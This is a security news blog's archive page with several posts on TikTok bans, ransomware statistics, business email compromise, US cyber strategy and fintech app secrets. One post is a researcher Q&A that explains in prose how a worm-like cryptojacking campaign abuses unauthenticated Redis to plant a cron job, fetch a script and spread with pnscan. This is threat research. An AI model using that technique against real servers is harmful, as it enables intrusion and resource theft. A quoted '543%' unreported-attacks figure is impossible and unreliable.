Archive for March 2, 2023

TikTok Banned By Four Provinces

Posted in Commentary with tags on March 2, 2023 by itnerd

First TikTok was banned on Canadian government devices by the Canadian government. Now TikTok has been banned on the devices of four provinces in Canada. Those provinces are:

  • Saskatchewan
  • Nova Scotia 
  • PEI
  • Newfoundland and Labrador

It should be noted that Alberta and Quebec have a TikTok ban in place. And I think it’s safe to say that other provinces and territories in Canada will be announcing similar bans. This is going increase the pressure on ByteDance who is facing similar bans in other places. Not to mention that the Canadian Privacy Commissioner is investigating TikTok. One has to wonder at what point do TikTok, or their Chinese Communist Party masters respond to this growing wave of bans on TikTok in Canada.

This will be interesting to watch.

BlackFog Releases Their State of Ransomware Report For February 2023

Posted in Commentary with tags on March 2, 2023 by itnerd

BlackFog has released the February 2023 State of Ransomware Report. BlackFog issues a monthly recap of the latest stats in ransomware attacks including prevalent threat actors, tactics, volume of attacks in varying countries and vertical sectors, rate of disclosed and undisclosed attacks compared to other months, and more. Please feel free to use this data in any articles, reports or research on ransomware attacks. 

Darren Williams, CEO and Founder, BlackFog, has provided perspectives on the state of ransomware for February 2023:

     “For the second month of 2023, we have seen new records broken, with February seeing a new high of 40 victims, a 43% increase from 2022. This month we continue to collect unreported data, and this month we see 543% of attacks remain unreported, a 65% increase over January.

Sector-wise we saw education continue to dominate with 17 victims, and healthcare and government closely behind with 15 each. Government attacks saw the biggest increase in February, with a 150% increase since January, while Healthcare and Education saw 88% and 70% increases respectively.

Data exfiltration continues as the main weapon of choice for ransomware and is used in 88% of all attacks. This month we also saw an increased number of attacks originating from China, which now represents 38% of all attacks, up from 36% in January. Russia remains stable at 9%.

Finally, in terms of variants, as we predicted in January we saw a dramatic increase in attacks from LockBit, as victims from previous months begin to disclose attacks. We expect this pattern to continue as unreported attacks continue to be dominated by LockBit, which is at 48%, while disclosed is at 24.3%. BlackCat also increased to 24.3%, although the growth in unreported remains significantly lower.”

I’d spend some time reading this report as it provides a lot of insight as to what threats you really need to worry about.

BEC 2.0 Attack Uses Conversation Hijacking in Legit Email Threads of Compromised Accounts

Posted in Commentary with tags on March 2, 2023 by itnerd

Avanan, A Check Point Software Company, has published a new report on tracking the rise and continuous evolution of Business Email Compromise (BEC) attacks as researchers observe different variants.

According to Jeremy Fuchs, Cybersecurity Researcher/Analyst at Avanan, there’s BEC 1.0, where hackers pose as your boss and ask you to get a gift card; BEC 2.0, leveraging compromised accounts at the organization to unleash attacks within legit emails; and BEC 3.0, a third tier researchers are seeing develop.

Conversation Hijacking: In this attack brief, the hacker takes over an account and inserts themselves into a legitimate conversation, posing as the employee of which the account has been compromised (i.e., someone took over my account and started replying as me – the end-user would have no way of knowing.)

The research is live here:

The National Cyber Strategy Is Out… Here’s Why It Matters

Posted in Commentary with tags on March 2, 2023 by itnerd

The Biden Administration has released the National Cybersecurity Strategy is out. And it has some interesting details:

The strategy – shaped by major hacking incidents that threatened key public services in the first year of the Biden administration – embraces the US government’s regulatory and purchasing power to force companies that are critical to economic and national security to raise their cyber defenses.

It reflects a widely held belief in the US government that market forces have failed to keep the nation safe from cybercriminals and an array of foreign governments such as Russia and China. 

“We ask individuals, small businesses and local government to shoulder a significant burden for defending us all. This isn’t just unfair, it’s ineffective,” Acting National Cyber Director Kemba Walden told reporters Wednesday. “This strategy asks more of industry, but also commits more from the government.”

The strategy is a policy document and not law, but it could shape corporate behavior for years to come as firms compete for billions of dollars in federal contracts that increasingly require a minimum set of cybersecurity defenses. And the White House says it wants to work with Congress to develop legislation that holds software makers liable when their products and services don’t provide adequate protections from sabotage.

Edgard Capdevielle, CEO of ICS/OT Cybersecurity Vendor of Nozomi Networks had this to say: 

“The National Cyber Strategy’s non-voluntary requirements for critical infrastructure to increase cybersecurity posture will be met with varying responses from CEOs and Boards alike. While the impetus for a better cyber posture to defend against potential nation-state adversaries is wise and necessary, the ability for these entities to identify the budget and personnel to manage these pieces is going to be difficult. As it is for most companies in this macroeconomic climate. We look forward to working with our U.S. critical infrastructure partners, just as we have with their international counterparts, to meet changing regulatory guidelines with the best defenses and visibility possible.” 

The nearly 40-page document provides a roadmap for new laws and regulations over the next few years aimed at helping the United States prepare for and fight emerging cyber threats. Hopefully this is effective at stopping the sort of large scale attacks that we’ve seen over the last few years.

UPDATE: Craig Burland, CISO of Inversion6 had this to say:

This strategy continues a trend of a more activist federal government pushing cybersecurity forward. Within the last 12 months or so, you can see increased announcements and initiatives from CISA, as an example, that foreshadowed something broader. The pillars build on existing ideas and cyber principles – defend critical infrastructure, support the nation’s collective defense, and embrace secure by design. That last item has been discussed in solution development forums for years, but hasn’t become a norm for producers. 

The real test will come in the pronouncements that follow.  A strategy by itself won’t compel companies to change how they invest. This strategy is a shot across the bow that signals tougher standards are coming.  How those manifest themselves will be fascinating to watch. Will the administration try to enact laws with associated fines? Will they pressure industry groups to do self-improvement? Can they become a catalyst for real change and help get cybersecurity past the tipping point where best practices are the only accepted practices? Hopefully, one way or another, they can spur real change and make all of our lives safer.

Novel Cryptojacking Malware Campaign Exploits Insecure Redis Deployment Using File Hosting Service

Posted in Commentary with tags on March 2, 2023 by itnerd

Matt Muir, Threat Intelligence Researcher at Cado Security, recently discovered a novel crypto jacking campaign targeting insecure deployments of Redis that leverages, a free, open-source command line file transfer service. 

This research has been published and analyzes initial access achieved by an exploit that’s a favourite of threat actor groups WatchDog & TeamTNT, why this a novel technique through exploring its primary payload (memory configuration, actions on objective, and propagation), and IoCs.

Although reports of this service being used for malware distribution have been rare, Cado Labs telemetry suggests that this is changing as researchers are seeing an uptick since the beginning of this year.

You can read the research here. But I also have a Q&A with Matt Muir, Threat Intelligence Researcher at Cado Security:

  1. The attackers compromise Redis insecure instances (do you know how?)
  • Redis exposes an API endpoint that allows developers to interact with the data store via the redis-cli command line tool
  • In more recent versions, they introduced authentication for this API endpoint (ignoring requests from unauthenticated clients)
  • Despite this, Redis’ security documentation states that DBAs should avoid exposing this endpoint to the internet
  • If the API endpoint is exposed to the internet, and authentication isn’t configured (or available), it’s possible for an attacker to remotely connect to the data store using redis-cli
  • Attackers use tools like pnscan (such as in this campaign) to conduct mass scanning of the internet, looking for nodes with the Redis default port open
  • If they find such nodes, they attempt to connect to Redis in an opportunistic manner
  1. Write a cron job that will trigger the reading of a file (exploit?) that allows them to execute code
  • Once connected to the data store, it’s possible to write values to specific keys
  • One such value could be a string representing a cron job
  • It’s also possible to use redis-cli to save a version of the database to disk
  • Once a string with cron syntax is written to a key, you can then use redis-cli to set the working directory to a cron directory
  • Saving the contents of the database to disk saves a binary file (representing the database) with the cron job embedded as a string
  • Crond then parses the database file as if it were a plaintext file containing a cronjob and registers the job
  • Execution is then determined by the syntax of the job
  • In this case, the job can be seen in the ‘command’ section of the first screenshot of the blog
  • It retrieves a script (analysis of which forms the bulk of the blog) from, saves it as .cmd and executes it via bash at an interval of every second minute
  1. The (same?) cron job executes every second minute and runs a cURL command to retrieve a payload from, which is saved as a .cmd file, which is executed and:
  • Correct, see above
  1. Prepares the targeted host for cyptomining (how “noisy” are these measures?)
  • This depends on the target system and how much monitoring is enabled
  • A lot of the host configuration would appear in audit daemon logs but these aren’t enabled by default
  • SELinux interaction appears in /var/log/avc.log (for some distros)
  • Configuration of drop_caches would be logged to /var/log/messages or /var/log/syslog depending on host settings
  1. Finally, the script retrieves the pnscan and XMRig binaries (also from
  • These tools are open source and are hosted on Github
  1. While XMRig starts mining, the script uses pnscan to find vulnerable Redis servers and propagate a copy of the script to them (Only Redis servers on the same network, or? Which weaknesses does it exploit to gain access to them and execute the script? How is the script delivered? Is this whole process automatic? If yes, could this be considered worm-like behavior?)
  • Propagation is conducted via the method described above
  • Pnscan is used for internet-wide scanning, so distribution is not limited to the local network
  • Which weaknesses does it exploit to gain access to them and execute the script?
    • Unauthenticated Redis file write, as mentioned above
  • How is the script delivered?
    • using the unauthenticated Redis file write method to write a cron job
  • Is this whole process automatic? If yes, could this be considered worm-like behavior?
    • yes and yes

– When you say “Security professionals should be aware of [the trend of criminals using] and implement detections accordingly,” what do you specifically mean?

  • If you currently have a network-based detection for traffic to other suspicious file hosting domains (e.g., supplement this detection with the domain
  • wasn’t previously known to host malware, now there’s evidence that it is being used to host malware

Study Finds That 92% of Google Play Store’s 650 Most Popular Fintech Apps Expose Exploitable Secrets

Posted in Commentary with tags on March 2, 2023 by itnerd

Ninety two percent of the most popular banking and financial services apps on the Google Play Store contain easy-to-extract secrets (such as API keys), which could be used by cyber attackers in scripts and bots to steal data, devastating consumers and the institutions they trust.

The study “Mobile App Security Report – Exposing the Security Vulnerabilities of Top Finance Apps” summarizes the work of the Approov Mobile Threat Lab. The team downloaded, decoded and scanned the top 200 financial services apps in the U.S., U.K., France and Germany, investigating a total of 650 unique apps. 

Only 5% of the apps examined had good defenses against runtime attacks manipulating the device environment and only 4% were well protected against Man-in-the-Middle (MitM) attacks at run-time. As well as immediately exposing secrets, scans also indicated two critical runtime attack surfaces that could be used to steal API keys at runtime.

Other findings: 

  • None of the 650 apps “ticked all the boxes” in terms of the three attack surfaces investigated. All failed in at least one category.
  • Only four apps had runtime protection against channel MitM attacks and “man-in-the-device.” All were payment and transfer apps and none with such protections were in the U.S.
  • In general, apps deployed in Europe were better protected than apps available only in the U.S., for immediate secret exposure and runtime protections. 
  • Crypto apps were more likely to leak sensitive secrets as 36% immediately offered highly sensitive secrets when scanned. 
  • 18% of personal finance apps leaked sensitive information, possibly because they are less dependent on sensitive APIs.
  • For Man-in-the-Device attacks, traditional banks’ mobile apps are twice as likely to be well protected over other sectors reflecting the use of packers and protectors to protect against run-time manipulation.   

The report can be found here.

UPDATE: Rajiv Pimplaskar, CEO of Dispersive Holdings, Inc. had this comment:

    “Cloud security is always constant battle between convenient access and secure access. In the examples of the reports, the wide majority of the applications contained “pre-baked” API keys that provided access to certain “secured” public services just by the presence of the API key. Once compromised, the security of the API is completely out the window. 

   “API keys for accessing *any* public service should not last indefinitely and they should never come directly with a mobile or enterprise application install. The most secure way is requiring that the API keys be received after proper authentication (and most likely Multi Factor Authentication, MFA). In today’s day and age, MFA is not difficult to set up and while it isn’t perfect, it provides meaningful resistance to most hackers and malicious actors looking for low hanging fruit. 

   “Once the API key is obtained, accessing the service is still a potential waving flag for malicious actors. The transport mechanisms and source/destination addresses can become immediate targets. 

   “That’s why stealth networking and solutions can be truly innovative. Obfuscating and encrypting and protecting data in transit can provide the enhanced security from mobile endpoint all the way to cloud. Additionally, with a stealth networking solution, the ability for a malicious actor to set up a MITM attack is severely hindered. By removing “known” open endpoints, malicious actors can’t easily setup the MITM to try to intercept and capture/modify packets.”

Attack Breakout Time Drops To Just 84 Minutes

Posted in Commentary with tags on March 2, 2023 by itnerd

I have some bad news if you’re responsible for defending your organization against threat actors.

Attackers have reduced the average time required to move laterally through systems by 14% last year, down to just 84 minutes, according to a new report out by Crowdstrike, giving defenders even less time to contain breaches after the initial breakout. 

Increasing the difficulty for defenders, a full 71% of the attacks used valid credentials for access, as opposed to malware, making detection by automated systems extremely difficult, up from 62% in 2021. Using “hands on keyboard” techniques make it harder for traditional anti-malware tools to detect activity according to CrowdStrike.

Like I said, this is bad news.

Ted Miracco, CEO of Approov Mobile Security:

   “It’s important to note that no single security measure can completely prevent all types of attacks, especially social engineering attacks. That said, mobile app attestation, runtime secrets protection, and RASP can all be highly effective measures in preventing credential access, SIM swapping, and MFA fatigue in mobile applications. 

   “Attestation techniques can help not only ensure that only genuine apps, and not tampered or cloned versions, are accessing APIs, it also uses the authorized application seamlessly as the second factor before accessing sensitive data. By verifying the integrity of the app at runtime, it both prevents attackers from injecting malicious code or accessing sensitive data. Runtime secrets protection can ensure that only valid app instances running in un-compromised environments can access the API keys and secrets stored in the cloud. This can prevent attackers from accessing these secrets even if they manage to gain control of the device. RASP can monitor, detect, and instantly block computer attacks, including new threats that were unforeseen during development. By continuously analyzing app behavior and detecting anomalies, RASP can prevent “interactive intrusions” and other types of attacks.

   “It’s best to use a combination of security measures, including those mentioned above, along with other security best practices such as proper authentication and authorization, encryption, and regular security testing and updates.”

The fact that attacks are getting faster and faster to execute means that we all have to work much harder to stop organizations from being victims. And the approach outlined above can certainly help with that… If everyone adopts that approach.